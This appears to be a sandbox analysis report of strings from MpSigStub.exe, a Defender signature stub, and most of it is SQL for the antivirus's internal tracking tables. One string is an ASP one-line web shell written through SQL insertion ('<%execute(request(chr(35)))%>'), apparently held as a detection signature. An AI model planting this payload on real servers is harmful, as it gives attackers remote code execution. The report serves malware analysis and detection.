Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AtomicCounters; SELECT Key FROM AtomicCounters ORDER BY InsertTime ASC LIMIT 1; SELECT Key, Name, Count, InsertTime, ExpireTime FROM AtomicCounters WHERE Key = ?; DELETE FROM AtomicCounters; DELETE FROM AtomicCounters WHERE ExpireTime < ?; DELETE FROM AtomicCounters WHERE AtomicCounters.Key = ?; SELECT Key FROM AtomicCounters WHERE AtomicCounters.Key = ?; UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?; INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(21, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime FROM AtomicCounters WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM BmFileInfo;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AtomicCounters;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ThreatRecordId, Action FROM BmFileActions WHERE FileInfoId == ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(17, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmHipsRuleInfo(ProcessInfoId, RuleAction, RuleId, IsAudit, IsInherited, State) VALUES (?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp FROM ProcessBlockHistory ORDER BY TimeStamp ASC LIMIT 1REPLACE INTO ProcessBlockHistory(ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity) VALUES (?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM ProcessBlockHistory WHERE TimeStamp < ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;DELETE FROM ProcessBlockHistory;SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;SELECT COUNT(1) FROM ProcessBlockHistory;SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? 
ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;[3
Source: MpSigStub.exe, 0000000B.00000003.18301444780.0000021B5E291000.00000004.00000001.sdmp Binary or memory string: SELECT information FROM tdata where dataname = '%s' and g_name = '%s';
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO ProcessInfo(FileName, ProcessId, CommandLine, StartTime, TokenElevation, TokenElevationType, IntegrityLevel) VALUES(? , ? , ? , ? , ? , ? , ? );
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key, RecordTimeStamp, Generation FROM RecordIdentifier WHERE ID = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(19, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM NetworkIpFirewallRules WHERE NetworkIpFirewallRules.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BackupProcessInfo(Key, FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(22, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM RansomwareDetections WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM SdnEx WHERE SdnEx.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmFileStartupActions(FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);SELECT ID FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;SELECT FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId FROM BmFileStartupActions WHERE FilePathHash = ?DELETE FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;SELECT Count(1) FROM BmFileStartupActions;|
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(29, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM SystemRegistryCache WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AttributeCounts;
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp Binary or memory string: insertinto[bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;')
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM AmsiFileCache;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AnomalyTables WHERE AnomalyTables.TableKey = ?;
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SystemRegistryCache(Key, FileIDHash, RegPath, RegOperation, NewRegType, OldRegType, OldRegData, NewRegData, InstanceTimeStamp) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime, UpdateTime) VALUES(? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO File(SHA1, MD5, lshashs, lshash, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n, Size, SHA256) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?, ?, ? );
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(30, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(23, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM RollingQueuesValues;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SdnEx(Key, CurrentCount) VALUES (?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(15, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: insert into blocksite (url) values('%s');
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(10, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmProcessInfo(PPIDHash, ProcessStartTime, PID, StructVersion, ImageFileName, MonitoringFlags_Flags, MonitoringFlags_VmHardenType, MonitoringFlags_ExemptVmHardenedTypes, CommandLineArgs, HipsInjectionId, FolderGuardId, Flags, LsassReadMemId, MonitoringFlags_Flags2Low, MonitoringFlags_Flags2High)VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM BackupProcessInfo;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key, FilePath, Context, InsertTime, ExpireTime FROM AttributePersistContext WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT FileInstance.ID FROM FileInstance, RecordIdentifier WHERE FileInstance.RecordID = RecordIdentifier.ID AND RecordIdentifier.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ?;SELECT COUNT(1) FROM ProcessBlockHistory;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? 
ORDER BY TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE TimeStamp < ?;SELECT ProcessPath, TimeStamp FROM ProcessBlockHistory ORDER BY TimeStamp ASC LIMIT 1SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;REPLACE INTO ProcessBlockHistory(ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity) VALUES (?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM ProcessBlockHistory;[3
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT RecordIdentifier.Key, FileInstance.RecordID, RecordIdentifier.RecordTimeStamp, FileInstance.TrackingEnabled, FileInstance.StorageEvent, FileInstance.StorageEventState, FileInstance.ModificationsCount, FileInstance.ParentRecordID, FileInstance.Parent_FileEvent, FileInstance.Parent_FileName, RecordIdentifier.Generation, FileInstance.FileName, FileInstance.USN, FileInstance.CreateTime, FileInstance.LastAccessTime, FileInstance.LastWriteTime, FileInstance.Signer, FileInstance.SignerHash, FileInstance.Issuer, FileInstance.SigningTime, FileInstance.MOTW, FileInstance.MOTWFromParent, FileInstance.IsValidCert, FileInstance.CertInvalidDetails, FileInstance.IsCatalogSigned, File.SHA1, File.MD5, File.lshashs, File.lshash, File.PartialCRC1, File.PartialCRC2, File.PartialCRC3, File.KCRC1, File.KCRC2, File.KCRC3, File.KCRC3n, File.Size, File.SHA256, ParentProcessInfo.CommandLine, ParentProcessInfo.FileName, ParentProcessInfo.IntegrityLevel, ParentProcessInfo.ProcessId, ParentProcessInfo.StartTime, ParentProcessInfo.TokenElevation, ParentProcessInfo.TokenElevationType, RemoteProcessInfo.CommandLine, RemoteProcessInfo.FileName, RemoteProcessInfo.IntegrityLevel, RemoteProcessInfo.TokenElevation, RemoteProcessInfo.TokenElevationType, ScanInfo.NamedAttributes, ScanInfo.PeAttributes, ScanInfo.PersistSigSeq, ScanInfo.ProgenitorPersistSigSeq, ScanInfo.ScanAgent, ScanInfo.ScanReason, ScanInfo.SigAttrEvents, ScanInfo.SigSeq, ScanInfo.SigSha, ScanInfo.WebURL,Engine.EngineVersion, Engine.SigVersion FROM RecordIdentifier INNER JOIN (FileInstance INNER JOIN File ON FileInstance.FileID = File.ID LEFT OUTER JOIN ProcessInfo as 'ParentProcessInfo' ON FileInstance.Parent_ProcessID = ParentProcessInfo.ID LEFT OUTER JOIN ProcessInfo as 'RemoteProcessInfo' ON FileInstance.Remote_ProcessID = RemoteProcessInfo.ID LEFT OUTER JOIN (ScanInfo INNER JOIN Engine ON ScanInfo.EngineID = 
Engine.ID) ON FileInstance.ScanID = ScanInfo.ID ) ON RecordIdentifier.ID = FileInstance.RecordID WHERE RecordIdentifier.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(9, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ?, UpdateTime = ?, WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM DynSigRevisions;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM ProcessBlockHistory;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM BmProcessInfo;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO ValueMapArray(Key, RecordType, ValueMapArrayBlob, InstanceTimeStamp) VALUES(?, ? , ? , ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime FROM AttributeCounts WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp FROM FileLowFiAsync WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM FileHashes;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RecordIdentifier(Key, RecordTimeStamp, Generation) VALUES(?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(27, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FileHashes(Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n) VALUES(?, ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT DetectionGuid, LkgTS, NextUSN, DetectionTS, ProvisionalRemedComplTS, RemedComplTS, ImpactedCBPNameSpaces FROM RansomwareDetections WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO NetworkIpFirewallRules(Key, FirewallRuleName, ExpiryTime) VALUES (?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces FROM BackupProcessInfo WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(7, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM RollingQueuesTables WHERE RollingQueuesTables.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: SELECT InfectedFileSHA, ProcFileId, SystemFilePath, CleanFileSha FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ? ORDER BY InstanceTimeStamp DESC;SELECT ID FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;DELETE FROM SystemFileCache WHERE InstanceTimeStamp < ?; SELECT Count(1) FROM SystemFileCache WHERE CleanFileShaHash = ?; INSERT INTO SystemFileCache(InfectedFileSHAHash, InfectedFileSHA, ProcFileIDSystemFileHash, ProcFileId, SystemFilePath, CleanFileSha, CleanFileShaHash, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?);SELECT CleanFileSha, CleanFileShaHash FROM SystemFileCache WHERE InstanceTimeStamp < ?; SELECT Count(1) FROM SystemFileCache;DELETE FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;2
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: insert into blocksite (url) values('%s');x
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; DELETE FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; SELECT COUNT(1) FROM AttributePersistContext; DELETE FROM AttributePersistContext WHERE ExpireTime < ?; SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1; INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(2, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;DELETE FROM FolderGuardPaths WHERE UserIdHash = ?;SELECT UserId, GUID, Path FROM FolderGuardPaths WHERE UserIdHash = ?N
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE AttributeCounts SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT (SELECT COUNT(*) FROM File) + (SELECT COUNT(*) FROM FileInstance);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RollingQueuesTables(Key, Name, Capacity, TimeToLive, Mode) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BackupProcessInfo WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(25, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;SELECT ID, NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;INSERT INTO BmFileActions(FileInfoId, ThreatRecordId, Action) VALUES (?, ?, ?);INSERT INTO BmFileInfo(NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;SELECT Count(1) FROM BmFileInfo;SELECT ThreatRecordId, Action FROM BmFileActions WHERE FileInfoId == ?;DELETE FROM BmFileActions;DELETE FROM BmFileInfo;B
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?; INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1; SELECT Key, FilePath, Context, InsertTime, ExpireTime FROM AttributePersistContext WHERE Key = ?; SELECT COUNT(1) FROM AttributePersistContext; DELETE FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; DELETE FROM AttributePersistContext WHERE ExpireTime < ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM BmFileStartupActions;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Engine(EngineVersion, SigVersion) VALUES(? , ? );
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E305B1C4 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetLastError,Process32FirstW,GetLastError,Process32NextW,GetLastError,FindCloseChangeNotification,CloseHandle, 18_2_00007FF7E305B1C4
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8556:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8488:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8556:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8488:120:WilError_03
